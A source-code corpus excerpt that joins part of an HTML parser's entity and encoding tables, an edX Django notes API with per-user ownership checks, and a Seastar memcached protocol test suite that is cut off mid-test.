"vee;": "\u2228",
"veebar;": "\u22bb",
"veeeq;": "\u225a",
"vellip;": "\u22ee",
"verbar;": "|",
"vert;": "|",
"vfr;": "\U0001d533",
"vltri;": "\u22b2",
"vnsub;": "\u2282\u20d2",
"vnsup;": "\u2283\u20d2",
"vopf;": "\U0001d567",
"vprop;": "\u221d",
"vrtri;": "\u22b3",
"vscr;": "\U0001d4cb",
"vsubnE;": "\u2acb\ufe00",
"vsubne;": "\u228a\ufe00",
"vsupnE;": "\u2acc\ufe00",
"vsupne;": "\u228b\ufe00",
"vzigzag;": "\u299a",
"wcirc;": "\u0175",
"wedbar;": "\u2a5f",
"wedge;": "\u2227",
"wedgeq;": "\u2259",
"weierp;": "\u2118",
"wfr;": "\U0001d534",
"wopf;": "\U0001d568",
"wp;": "\u2118",
"wr;": "\u2240",
"wreath;": "\u2240",
"wscr;": "\U0001d4cc",
"xcap;": "\u22c2",
"xcirc;": "\u25ef",
"xcup;": "\u22c3",
"xdtri;": "\u25bd",
"xfr;": "\U0001d535",
"xhArr;": "\u27fa",
"xharr;": "\u27f7",
"xi;": "\u03be",
"xlArr;": "\u27f8",
"xlarr;": "\u27f5",
"xmap;": "\u27fc",
"xnis;": "\u22fb",
"xodot;": "\u2a00",
"xopf;": "\U0001d569",
"xoplus;": "\u2a01",
"xotime;": "\u2a02",
"xrArr;": "\u27f9",
"xrarr;": "\u27f6",
"xscr;": "\U0001d4cd",
"xsqcup;": "\u2a06",
"xuplus;": "\u2a04",
"xutri;": "\u25b3",
"xvee;": "\u22c1",
"xwedge;": "\u22c0",
"yacute": "\xfd",
"yacute;": "\xfd",
"yacy;": "\u044f",
"ycirc;": "\u0177",
"ycy;": "\u044b",
"yen": "\xa5",
"yen;": "\xa5",
"yfr;": "\U0001d536",
"yicy;": "\u0457",
"yopf;": "\U0001d56a",
"yscr;": "\U0001d4ce",
"yucy;": "\u044e",
"yuml": "\xff",
"yuml;": "\xff",
"zacute;": "\u017a",
"zcaron;": "\u017e",
"zcy;": "\u0437",
"zdot;": "\u017c",
"zeetrf;": "\u2128",
"zeta;": "\u03b6",
"zfr;": "\U0001d537",
"zhcy;": "\u0436",
"zigrarr;": "\u21dd",
"zopf;": "\U0001d56b",
"zscr;": "\U0001d4cf",
"zwj;": "\u200d",
"zwnj;": "\u200c",
}
replacementCharacters = {
0x0: "\uFFFD",
0x0d: "\u000D",
0x80: "\u20AC",
0x81: "\u0081",
0x81: "\u0081",
0x82: "\u201A",
0x83: "\u0192",
0x84: "\u201E",
0x85: "\u2026",
0x86: "\u2020",
0x87: "\u2021",
0x88: "\u02C6",
0x89: "\u2030",
0x8A: "\u0160",
0x8B: "\u2039",
0x8C: "\u0152",
0x8D: "\u008D",
0x8E: "\u017D",
0x8F: "\u008F",
0x90: "\u0090",
0x91: "\u2018",
0x92: "\u2019",
0x93: "\u201C",
0x94: "\u201D",
0x95: "\u2022",
0x96: "\u2013",
0x97: "\u2014",
0x98: "\u02DC",
0x99: "\u2122",
0x9A: "\u0161",
0x9B: "\u203A",
0x9C: "\u0153",
0x9D: "\u009D",
0x9E: "\u017E",
0x9F: "\u0178",
}
encodings = {
'437': 'cp437',
'850': 'cp850',
'852': 'cp852',
'855': 'cp855',
'857': 'cp857',
'860': 'cp860',
'861': 'cp861',
'862': 'cp862',
'863': 'cp863',
'865': 'cp865',
'866': 'cp866',
'869': 'cp869',
'ansix341968': 'ascii',
'ansix341986': 'ascii',
'arabic': 'iso8859-6',
'ascii': 'ascii',
'asmo708': 'iso8859-6',
'big5': 'big5',
'big5hkscs': 'big5hkscs',
'chinese': 'gbk',
'cp037': 'cp037',
'cp1026': 'cp1026',
'cp154': 'ptcp154',
'cp367': 'ascii',
'cp424': 'cp424',
'cp437': 'cp437',
'cp500': 'cp500',
'cp775': 'cp775',
'cp819': 'windows-1252',
'cp850': 'cp850',
'cp852': 'cp852',
'cp855': 'cp855',
'cp857': 'cp857',
'cp860': 'cp860',
'cp861': 'cp861',
'cp862': 'cp862',
'cp863': 'cp863',
'cp864': 'cp864',
'cp865': 'cp865',
'cp866': 'cp866',
'cp869': 'cp869',
'cp936': 'gbk',
'cpgr': 'cp869',
'cpis': 'cp861',
'csascii': 'ascii',
'csbig5': 'big5',
'cseuckr': 'cp949',
'cseucpkdfmtjapanese': 'euc_jp',
'csgb2312': 'gbk',
'cshproman8': 'hp-roman8',
'csibm037': 'cp037',
'csibm1026': 'cp1026',
'csibm424': 'cp424',
'csibm500': 'cp500',
'csibm855': 'cp855',
'csibm857': 'cp857',
'csibm860': 'cp860',
'csibm861': 'cp861',
'csibm863': 'cp863',
'csibm864': 'cp864',
'csibm865': 'cp865',
'csibm866': 'cp866',
'csibm869': 'cp869',
'csiso2022jp': 'iso2022_jp',
'csiso2022jp2': 'iso2022_jp_2',
'csiso2022kr': 'iso2022_kr',
'csiso58gb231280': 'gbk',
'csisolatin1': 'windows-1252',
'csisolatin2': 'iso8859-2',
'csisolatin3': 'iso8859-3',
'csisolatin4': 'iso8859-4',
'csisolatin5': 'windows-1254',
'csisolatin6': 'iso8859-10',
'csisolatinarabic': 'iso8859-6',
'csisolatincyrillic': 'iso8859-5',
'csisolatingreek': 'iso8859-7',
'csisolatinhebrew': 'iso8859-8',
'cskoi8r': 'koi8-r',
'csksc56011987': 'cp949',
'cspc775baltic': 'cp775',
'cspc850multilingual': 'cp850',
'cspc862latinhebrew': 'cp862',
'cspc8codepage437': 'cp437',
'cspcp852': 'cp852',
'csptcp154': 'ptcp154',
'csshiftjis': 'shift_jis',
'csunicode11utf7': 'utf-7',
'cyrillic': 'iso8859-5',
'cyrillicasian': 'ptcp154',
'ebcdiccpbe': 'cp500',
'ebcdiccpca': 'cp037',
'ebcdiccpch': 'cp500',
'ebcdiccphe': 'cp424',
'ebcdiccpnl': 'cp037',
'ebcdiccpus': 'cp037',
'ebcdiccpwt': 'cp037',
'ecma114': 'iso8859-6',
'ecma118': 'iso8859-7',
'elot928': 'iso8859-7',
'eucjp': 'euc_jp',
'euckr': 'cp949',
'extendedunixcodepackedformatforjapanese': 'euc_jp',
'gb18030': 'gb18030',
'gb2312': 'gbk',
'gb231280': 'gbk',
'gbk': 'gbk',
'greek': 'iso8859-7',
'greek8': 'iso8859-7',
'hebrew': 'iso8859-8',
'hproman8': 'hp-roman8',
'hzgb2312': 'hz',
'ibm037': 'cp037',
'ibm1026': 'cp1026',
'ibm367': 'ascii',
'ibm424': 'cp424',
'ibm437': 'cp437',
'ibm500': 'cp500',
'ibm775': 'cp775',
'ibm819': 'windows-1252',
'ibm850': 'cp850',
'ibm852': 'cp852',
'ibm855': 'cp855',
'ibm857': 'cp857',
'ibm860': 'cp860',
'ibm861': 'cp861',
'ibm862': 'cp862',
'ibm863': 'cp863',
'ibm864': 'cp864',
'ibm865': 'cp865',
'ibm866': 'cp866',
'ibm869': 'cp869',
'iso2022jp': 'iso2022_jp',
'iso2022jp2': 'iso2022_jp_2',
'iso2022kr': 'iso2022_kr',
'iso646irv1991': 'ascii',
'iso646us': 'ascii',
'iso88591': 'windows-1252',
'iso885910': 'iso8859-10',
'iso8859101992': 'iso8859-10',
'iso885911987': 'windows-1252',
'iso885913': 'iso8859-13',
'iso885914': 'iso8859-14',
'iso8859141998': 'iso8859-14',
'iso885915': 'iso8859-15',
'iso885916': 'iso8859-16',
'iso8859162001': 'iso8859-16',
'iso88592': 'iso8859-2',
'iso885921987': 'iso8859-2',
'iso88593': 'iso8859-3',
'iso885931988': 'iso8859-3',
'iso88594': 'iso8859-4',
'iso885941988': 'iso8859-4',
'iso88595': 'iso8859-5',
'iso885951988': 'iso8859-5',
'iso88596': 'iso8859-6',
'iso885961987': 'iso8859-6',
'iso88597': 'iso8859-7',
'iso885971987': 'iso8859-7',
'iso88598': 'iso8859-8',
'iso885981988': 'iso8859-8',
'iso88599': 'windows-1254',
'iso885991989': 'windows-1254',
'isoceltic': 'iso8859-14',
'isoir100': 'windows-1252',
'isoir101': 'iso8859-2',
'isoir109': 'iso8859-3',
'isoir110': 'iso8859-4',
'isoir126': 'iso8859-7',
'isoir127': 'iso8859-6',
'isoir138': 'iso8859-8',
'isoir144': 'iso8859-5',
'isoir148': 'windows-1254',
'isoir149': 'cp949',
'isoir157': 'iso8859-10',
'isoir199': 'iso8859-14',
'isoir226': 'iso8859-16',
'isoir58': 'gbk',
'isoir6': 'ascii',
'koi8r': 'koi8-r',
'koi8u': 'koi8-u',
'korean': 'cp949',
'ksc5601': 'cp949',
'ksc56011987': 'cp949',
'ksc56011989': 'cp949',
'l1': 'windows-1252',
'l10': 'iso8859-16',
'l2': 'iso8859-2',
'l3': 'iso8859-3',
'l4': 'iso8859-4',
'l5': 'windows-1254',
'l6': 'iso8859-10',
'l8': 'iso8859-14',
'latin1': 'windows-1252',
'latin10': 'iso8859-16',
'latin2': 'iso8859-2',
'latin3': 'iso8859-3',
'latin4': 'iso8859-4',
'latin5': 'windows-1254',
'latin6': 'iso8859-10',
'latin8': 'iso8859-14',
'latin9': 'iso8859-15',
'ms936': 'gbk',
'mskanji': 'shift_jis',
'pt154': 'ptcp154',
'ptcp154': 'ptcp154',
'r8': 'hp-roman8',
'roman8': 'hp-roman8',
'shiftjis': 'shift_jis',
'tis620': 'cp874',
'unicode11utf7': 'utf-7',
'us': 'ascii',
'usascii': 'ascii',
'utf16': 'utf-16',
'utf16be': 'utf-16-be',
'utf16le': 'utf-16-le',
'utf8': 'utf-8',
'windows1250': 'cp1250',
'windows1251': 'cp1251',
'windows1252': 'cp1252',
'windows1253': 'cp1253',
'windows1254': 'cp1254',
'windows1255': 'cp1255',
'windows1256': 'cp1256',
'windows1257': 'cp1257',
'windows1258': 'cp1258',
'windows936': 'gbk',
'x-x-big5': 'big5'}
tokenTypes = {
"Doctype": 0,
"Characters": 1,
"SpaceCharacters": 2,
"StartTag": 3,
"EndTag": 4,
"EmptyTag": 5,
"Comment": 6,
"ParseError": 7
}
tagTokenTypes = frozenset((tokenTypes["StartTag"], tokenTypes["EndTag"],
tokenTypes["EmptyTag"]))
prefixes = dict([(v, k) for k, v in namespaces.items()])
prefixes["http://www.w3.org/1998/Math/MathML"] = "math"
class DataLossWarning(UserWarning):
pass
class ReparseException(Exception):
pass
| gpl-3.0 |
cselis86/edx-platform | lms/djangoapps/notes/api.py | 165 | 7855 | from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, Http404
from django.core.exceptions import ValidationError
from notes.models import Note
from notes.utils import notes_enabled_for_course
from courseware.courses import get_course_with_access
import json
import logging
import collections
log = logging.getLogger(__name__)
API_SETTINGS = {
'META': {'name': 'Notes API', 'version': 1},
# Maps resources to HTTP methods and actions
'RESOURCE_MAP': {
'root': {'GET': 'root'},
'notes': {'GET': 'index', 'POST': 'create'},
'note': {'GET': 'read', 'PUT': 'update', 'DELETE': 'delete'},
'search': {'GET': 'search'},
},
# Cap the number of notes that can be returned in one request
'MAX_NOTE_LIMIT': 1000,
}
# Wrapper class for HTTP response and data. All API actions are expected to return this.
ApiResponse = collections.namedtuple('ApiResponse', ['http_response', 'data'])
#----------------------------------------------------------------------#
# API requests are routed through api_request() using the resource map.
def api_enabled(request, course_key):
'''
Returns True if the api is enabled for the course, otherwise False.
'''
course = _get_course(request, course_key)
return notes_enabled_for_course(course)
@login_required
def api_request(request, course_id, **kwargs):
'''
Routes API requests to the appropriate action method and returns JSON.
Raises a 404 if the requested resource does not exist or notes are
disabled for the course.
'''
assert isinstance(course_id, basestring)
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# Verify that the api should be accessible to this course
if not api_enabled(request, course_key):
log.debug('Notes are disabled for course: {0}'.format(course_id))
raise Http404
# Locate the requested resource
resource_map = API_SETTINGS.get('RESOURCE_MAP', {})
resource_name = kwargs.pop('resource')
resource_method = request.method
resource = resource_map.get(resource_name)
if resource is None:
log.debug('Resource "{0}" does not exist'.format(resource_name))
raise Http404
if resource_method not in resource.keys():
log.debug('Resource "{0}" does not support method "{1}"'.format(resource_name, resource_method))
raise Http404
# Execute the action associated with the resource
func = resource.get(resource_method)
module = globals()
if func not in module:
log.debug('Function "{0}" does not exist for request {1} {2}'.format(func, resource_method, resource_name))
raise Http404
log.debug('API request: {0} {1}'.format(resource_method, resource_name))
api_response = module[func](request, course_key, **kwargs)
http_response = api_format(api_response)
return http_response
def api_format(api_response):
'''
Takes an ApiResponse and returns an HttpResponse.
'''
http_response = api_response.http_response
content_type = 'application/json'
content = ''
# not doing a strict boolean check on data becuase it could be an empty list
if api_response.data is not None and api_response.data != '':
content = json.dumps(api_response.data)
http_response['Content-type'] = content_type
http_response.content = content
log.debug('API response type: {0} content: {1}'.format(content_type, content))
return http_response
def _get_course(request, course_key):
'''
Helper function to load and return a user's course.
'''
return get_course_with_access(request.user, 'load', course_key)
#----------------------------------------------------------------------#
# API actions exposed via the resource map.
def index(request, course_key):
'''
Returns a list of annotation objects.
'''
MAX_LIMIT = API_SETTINGS.get('MAX_NOTE_LIMIT')
notes = Note.objects.order_by('id').filter(course_id=course_key,
user=request.user)[:MAX_LIMIT]
return ApiResponse(http_response=HttpResponse(), data=[note.as_dict() for note in notes])
def create(request, course_key):
'''
Receives an annotation object to create and returns a 303 with the read location.
'''
note = Note(course_id=course_key, user=request.user)
try:
note.clean(request.body)
except ValidationError as e:
log.debug(e)
return ApiResponse(http_response=HttpResponse('', status=400), data=None)
note.save()
response = HttpResponse('', status=303)
response['Location'] = note.get_absolute_url()
return ApiResponse(http_response=response, data=None)
def read(request, _course_key, note_id):
'''
Returns a single annotation object.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
return ApiResponse(http_response=HttpResponse(), data=note.as_dict())
def update(request, course_key, note_id): # pylint: disable=unused-argument
'''
Updates an annotation object and returns a 303 with the read location.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
try:
note.clean(request.body)
except ValidationError as e:
log.debug(e)
return ApiResponse(http_response=HttpResponse('', status=400), data=None)
note.save()
response = HttpResponse('', status=303)
response['Location'] = note.get_absolute_url()
return ApiResponse(http_response=response, data=None)
def delete(request, course_id, note_id):
'''
Deletes the annotation object and returns a 204 with no content.
'''
try:
note = Note.objects.get(id=note_id)
except Note.DoesNotExist:
return ApiResponse(http_response=HttpResponse('', status=404), data=None)
if note.user.id != request.user.id:
return ApiResponse(http_response=HttpResponse('', status=403), data=None)
note.delete()
return ApiResponse(http_response=HttpResponse('', status=204), data=None)
def search(request, course_key):
'''
Returns a subset of annotation objects based on a search query.
'''
MAX_LIMIT = API_SETTINGS.get('MAX_NOTE_LIMIT')
# search parameters
offset = request.GET.get('offset', '')
limit = request.GET.get('limit', '')
uri = request.GET.get('uri', '')
# validate search parameters
if offset.isdigit():
offset = int(offset)
else:
offset = 0
if limit.isdigit():
limit = int(limit)
if limit == 0 or limit > MAX_LIMIT:
limit = MAX_LIMIT
else:
limit = MAX_LIMIT
# set filters
filters = {'course_id': course_key, 'user': request.user}
if uri != '':
filters['uri'] = uri
# retrieve notes
notes = Note.objects.order_by('id').filter(**filters)
total = notes.count()
rows = notes[offset:offset + limit]
result = {
'total': total,
'rows': [note.as_dict() for note in rows]
}
return ApiResponse(http_response=HttpResponse(), data=result)
def root(request, course_key): # pylint: disable=unused-argument
'''
Returns version information about the API.
'''
return ApiResponse(http_response=HttpResponse(), data=API_SETTINGS.get('META'))
| agpl-3.0 |
shyamalschandra/seastar | tests/memcached/test_memcached.py | 25 | 22367 | #!/usr/bin/env python3
#
# This file is open source software, licensed to you under the terms
# of the Apache License, Version 2.0 (the "License"). See the NOTICE file
# distributed with this work for additional information regarding copyright
# ownership. You may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from contextlib import contextmanager
import socket
import struct
import sys
import random
import argparse
import time
import re
import unittest
server_addr = None
call = None
args = None
class TimeoutError(Exception):
pass
@contextmanager
def tcp_connection(timeout=1):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(server_addr)
def call(msg):
s.send(msg.encode())
return s.recv(16*1024)
yield call
s.close()
def slow(f):
def wrapper(self):
if args.fast:
raise unittest.SkipTest('Slow')
return f(self)
return wrapper
def recv_all(s):
m = b''
while True:
data = s.recv(1024)
if not data:
break
m += data
return m
def tcp_call(msg, timeout=1):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(server_addr)
s.send(msg.encode())
s.shutdown(socket.SHUT_WR)
data = recv_all(s)
s.close()
return data
def udp_call_for_fragments(msg, timeout=1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(timeout)
this_req_id = random.randint(-32768, 32767)
datagram = struct.pack(">hhhh", this_req_id, 0, 1, 0) + msg.encode()
sock.sendto(datagram, server_addr)
messages = {}
n_determined = None
while True:
data, addr = sock.recvfrom(1500)
req_id, seq, n, res = struct.unpack_from(">hhhh", data)
content = data[8:]
if n_determined and n_determined != n:
raise Exception('Inconsitent number of total messages, %d and %d' % (n_determined, n))
n_determined = n
if req_id != this_req_id:
raise Exception('Invalid request id: ' + req_id + ', expected ' + this_req_id)
if seq in messages:
raise Exception('Duplicate message for seq=' + seq)
messages[seq] = content
if len(messages) == n:
break
for k, v in sorted(messages.items(), key=lambda e: e[0]):
yield v
sock.close()
def udp_call(msg, **kwargs):
return b''.join(udp_call_for_fragments(msg, **kwargs))
class MemcacheTest(unittest.TestCase):
def set(self, key, value, flags=0, expiry=0):
self.assertEqual(call('set %s %d %d %d\r\n%s\r\n' % (key, flags, expiry, len(value), value)), b'STORED\r\n')
def delete(self, key):
self.assertEqual(call('delete %s\r\n' % key), b'DELETED\r\n')
def assertHasKey(self, key):
resp = call('get %s\r\n' % key)
if not resp.startswith(('VALUE %s' % key).encode()):
self.fail('Key \'%s\' should be present, but got: %s' % (key, resp.decode()))
def assertNoKey(self, key):
resp = call('get %s\r\n' % key)
if resp != b'END\r\n':
self.fail('Key \'%s\' should not be present, but got: %s' % (key, resp.decode()))
def setKey(self, key):
self.set(key, 'some value')
def getItemVersion(self, key):
m = re.match(r'VALUE %s \d+ \d+ (?P<version>\d+)' % key, call('gets %s\r\n' % key).decode())
return int(m.group('version'))
def getStat(self, name, call_fn=None):
if not call_fn: call_fn = call
resp = call_fn('stats\r\n').decode()
m = re.search(r'STAT %s (?P<value>.+)' % re.escape(name), resp, re.MULTILINE)
return m.group('value')
def flush(self):
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
def tearDown(self):
self.flush()
class TcpSpecificTests(MemcacheTest):
def test_recovers_from_errors_in_the_stream(self):
with tcp_connection() as conn:
self.assertEqual(conn('get\r\n'), b'ERROR\r\n')
self.assertEqual(conn('get key\r\n'), b'END\r\n')
def test_incomplete_command_results_in_error(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_addr)
s.send(b'get')
s.shutdown(socket.SHUT_WR)
self.assertEqual(recv_all(s), b'ERROR\r\n')
s.close()
def test_stream_closed_results_in_error(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_addr)
s.shutdown(socket.SHUT_WR)
self.assertEqual(recv_all(s), b'')
s.close()
def test_unsuccesful_parsing_does_not_leave_data_behind(self):
with tcp_connection() as conn:
self.assertEqual(conn('set key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
self.assertRegexpMatches(conn('delete a b c\r\n'), b'^(CLIENT_)?ERROR.*\r\n$')
self.assertEqual(conn('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(conn('delete key\r\n'), b'DELETED\r\n')
def test_flush_all_no_reply(self):
self.assertEqual(call('flush_all noreply\r\n'), b'')
def test_set_no_reply(self):
self.assertEqual(call('set key 0 0 5 noreply\r\nhello\r\nget key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.delete('key')
def test_delete_no_reply(self):
self.setKey('key')
self.assertEqual(call('delete key noreply\r\nget key\r\n'), b'END\r\n')
def test_add_no_reply(self):
self.assertEqual(call('add key 0 0 1 noreply\r\na\r\nget key\r\n'), b'VALUE key 0 1\r\na\r\nEND\r\n')
self.delete('key')
def test_replace_no_reply(self):
self.assertEqual(call('set key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('replace key 0 0 1 noreply\r\nb\r\nget key\r\n'), b'VALUE key 0 1\r\nb\r\nEND\r\n')
self.delete('key')
def test_cas_noreply(self):
self.assertNoKey('key')
self.assertEqual(call('cas key 0 0 1 1 noreply\r\na\r\n'), b'')
self.assertNoKey('key')
self.assertEqual(call('add key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
version = self.getItemVersion('key')
self.assertEqual(call('cas key 1 0 5 %d noreply\r\naloha\r\n' % (version + 1)), b'')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(call('cas key 1 0 5 %d noreply\r\naloha\r\n' % (version)), b'')
self.assertEqual(call('get key\r\n'), b'VALUE key 1 5\r\naloha\r\nEND\r\n')
self.delete('key')
@slow
def test_connection_statistics(self):
with tcp_connection() as conn:
curr_connections = int(self.getStat('curr_connections', call_fn=conn))
total_connections = int(self.getStat('total_connections', call_fn=conn))
with tcp_connection() as conn2:
self.assertEquals(curr_connections + 1, int(self.getStat('curr_connections', call_fn=conn)))
self.assertEquals(total_connections + 1, int(self.getStat('total_connections', call_fn=conn)))
self.assertEquals(total_connections + 1, int(self.getStat('total_connections', call_fn=conn)))
time.sleep(0.1)
self.assertEquals(curr_connections, int(self.getStat('curr_connections', call_fn=conn)))
class UdpSpecificTests(MemcacheTest):
def test_large_response_is_split_into_mtu_chunks(self):
max_datagram_size = 1400
data = '1' * (max_datagram_size*3)
self.set('key', data)
chunks = list(udp_call_for_fragments('get key\r\n'))
for chunk in chunks:
self.assertLessEqual(len(chunk), max_datagram_size)
self.assertEqual(b''.join(chunks).decode(),
'VALUE key 0 %d\r\n%s\r\n' \
'END\r\n' % (len(data), data))
self.delete('key')
class TestCommands(MemcacheTest):
def test_basic_commands(self):
self.assertEqual(call('get key\r\n'), b'END\r\n')
self.assertEqual(call('set key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
self.assertEqual(call('delete key\r\n'), b'DELETED\r\n')
self.assertEqual(call('delete key\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('get key\r\n'), b'END\r\n')
def test_error_handling(self):
self.assertEqual(call('get\r\n'), b'ERROR\r\n')
@slow
def test_expiry(self):
self.assertEqual(call('set key 0 1 5\r\nhello\r\n'), b'STORED\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
time.sleep(1)
self.assertEqual(call('get key\r\n'), b'END\r\n')
@slow
def test_expiry_at_epoch_time(self):
expiry = int(time.time()) + 1
self.assertEqual(call('set key 0 %d 5\r\nhello\r\n' % expiry), b'STORED\r\n')
self.assertEqual(call('get key\r\n'), b'VALUE key 0 5\r\nhello\r\nEND\r\n')
time.sleep(2)
self.assertEqual(call('get key\r\n'), b'END\r\n')
def test_multiple_keys_in_get(self):
self.assertEqual(call('set key1 0 0 2\r\nv1\r\n'), b'STORED\r\n')
self.assertEqual(call('set key 0 0 2\r\nv2\r\n'), b'STORED\r\n')
resp = call('get key1 key\r\n')
self.assertRegexpMatches(resp, b'^(VALUE key1 0 2\r\nv1\r\nVALUE key 0 2\r\nv2\r\nEND\r\n)|(VALUE key 0 2\r\nv2\r\nVALUE key1 0 2\r\nv1\r\nEND\r\n)$')
self.delete("key")
self.delete("key1")
def test_flush_all(self):
self.set('key', 'value')
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.assertNoKey('key')
def test_keys_set_after_flush_remain(self):
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.setKey('key')
self.assertHasKey('key')
self.delete('key')
@slow
def test_flush_all_with_timeout_flushes_all_keys_even_those_set_after_flush(self):
self.setKey('key')
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n')
self.assertHasKey('key')
self.setKey('key2')
time.sleep(2)
self.assertNoKey('key')
self.assertNoKey('key2')
@slow
def test_subsequent_flush_is_merged(self):
self.setKey('key')
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n') # Can flush in anything between 1-2
self.assertEqual(call('flush_all 4\r\n'), b'OK\r\n') # Can flush in anything between 3-4
time.sleep(2)
self.assertHasKey('key')
self.setKey('key2')
time.sleep(4)
self.assertNoKey('key')
self.assertNoKey('key2')
@slow
def test_immediate_flush_cancels_delayed_flush(self):
self.assertEqual(call('flush_all 2\r\n'), b'OK\r\n')
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
self.setKey('key')
time.sleep(1)
self.assertHasKey('key')
self.delete('key')
@slow
def test_flushing_in_the_past(self):
self.setKey('key1')
time.sleep(1)
self.setKey('key2')
key2_time = int(time.time())
self.assertEqual(call('flush_all %d\r\n' % (key2_time - 1)), b'OK\r\n')
self.assertNoKey("key1")
self.assertNoKey("key2")
@slow
def test_memcache_does_not_crash_when_flushing_with_already_expred_items(self):
self.assertEqual(call('set key1 0 2 5\r\nhello\r\n'), b'STORED\r\n')
time.sleep(1)
self.assertEqual(call('flush_all\r\n'), b'OK\r\n')
def test_response_spanning_many_datagrams(self):
key1_data = '1' * 1000
key2_data = '2' * 1000
key3_data = '3' * 1000
self.set('key1', key1_data)
self.set('key2', key2_data)
self.set('key3', key3_data)
resp = call('get key1 key2 key3\r\n').decode()
pattern = '^VALUE (?P<v1>.*?\r\n.*?)\r\nVALUE (?P<v2>.*?\r\n.*?)\r\nVALUE (?P<v3>.*?\r\n.*?)\r\nEND\r\n$'
self.assertRegexpMatches(resp, pattern)
m = re.match(pattern, resp)
self.assertEqual(set([m.group('v1'), m.group('v2'), m.group('v3')]),
set(['key1 0 %d\r\n%s' % (len(key1_data), key1_data),
'key2 0 %d\r\n%s' % (len(key2_data), key2_data),
'key3 0 %d\r\n%s' % (len(key3_data), key3_data)]))
self.delete('key1')
self.delete('key2')
self.delete('key3')
def test_version(self):
self.assertRegexpMatches(call('version\r\n'), b'^VERSION .*\r\n$')
def test_add(self):
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'NOT_STORED\r\n')
self.delete('key')
def test_replace(self):
self.assertEqual(call('add key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.assertEqual(call('replace key 0 0 1\r\na\r\n'), b'STORED\r\n')
self.delete('key')
self.assertEqual(call('replace key 0 0 1\r\na\r\n'), b'NOT_STORED\r\n')
def test_cas_and_gets(self):
self.assertEqual(call('cas key 0 0 1 1\r\na\r\n'), b'NOT_FOUND\r\n')
self.assertEqual(call('add key 0 0 5\r\nhello\r\n'), b'STORED\r\n')
version = self.getItemVersion('key')
self.assertEqual(call('set key 1 0 5\r\nhello\r\n'), b'STORED\r\n')
self.assertEqual(call('gets key\r\n').decode(), 'VALUE key 1 5 %d\r\nhello\r\nEND\r\n' % (version + 1))
self.assertEqual(call('cas key 0 0 5 %d\r\nhello\r\n' % (version)), b'EXISTS\r\n')
self.assertEqual(call('cas key 0 0 5 %d\r\naloha\r\n' % (version + 1)), b'STORED\r\n')
self.assertEqual(call('gets key\r\n').decode(), 'VALUE key 0 5 %d\r\naloha\r\nEND\r\n' % (version + 2))
self.delete('key')
def test_curr_items_stat(self):
self.assertEquals(0, int(self.getStat('curr_items')))
self.setKey('key')
self.assertEquals(1, int(self.getStat('curr_items')))
self.delete('key')
self.assertEquals(0, int(self.getStat('curr_items')))
def test_how_stats_change_with_different_commands(self):
get_count = int(self.getStat('cmd_get'))
set_count = int(self.getStat('cmd_set'))
flush_count = int(self.getStat('cmd_flush'))
total_items = int(self.getStat('total_items'))
get_misses = int(self.getStat('get_misses'))
get_hits = int(self.getStat('get_hits'))
cas_hits = int(self.getStat('cas_hits'))
cas_badval = int(self.getStat('cas_badval'))
cas_misses = int(self.getStat('cas_misses'))
delete_misses = int(self.getStat('delete_misses'))
delete_hits = int(self.getStat('delete_hits'))
curr_connections = int(self.getStat('curr_connections'))
incr_hits = int(self.getStat('incr_hits'))
incr_misses = int(self.getStat('incr_misses'))
decr_hits = int(self.getStat('decr_hits'))
decr_misses = int(self.getStat('decr_misses'))
call('get key\r\n')
get_count += 1
get_misses += 1
call('gets key\r\n')
get_count += 1
get_misses += 1
call('set key1 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('get key1\r\n')
get_count += 1
get_hits += 1
call('add key1 0 0 1\r\na\r\n')
set_count += 1
call('add key2 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('replace key1 0 0 1\r\na\r\n')
set_count += 1
total_items += 1
call('replace key3 0 0 1\r\na\r\n')
set_count += 1
call('cas key4 0 0 1 1\r\na\r\n')
set_count += 1
cas_misses += 1
call('cas key1 0 0 1 %d\r\na\r\n' % self.getItemVersion('key1'))
set_count += 1
get_count += 1
get_hits += 1
cas_hits += 1
total_items += 1
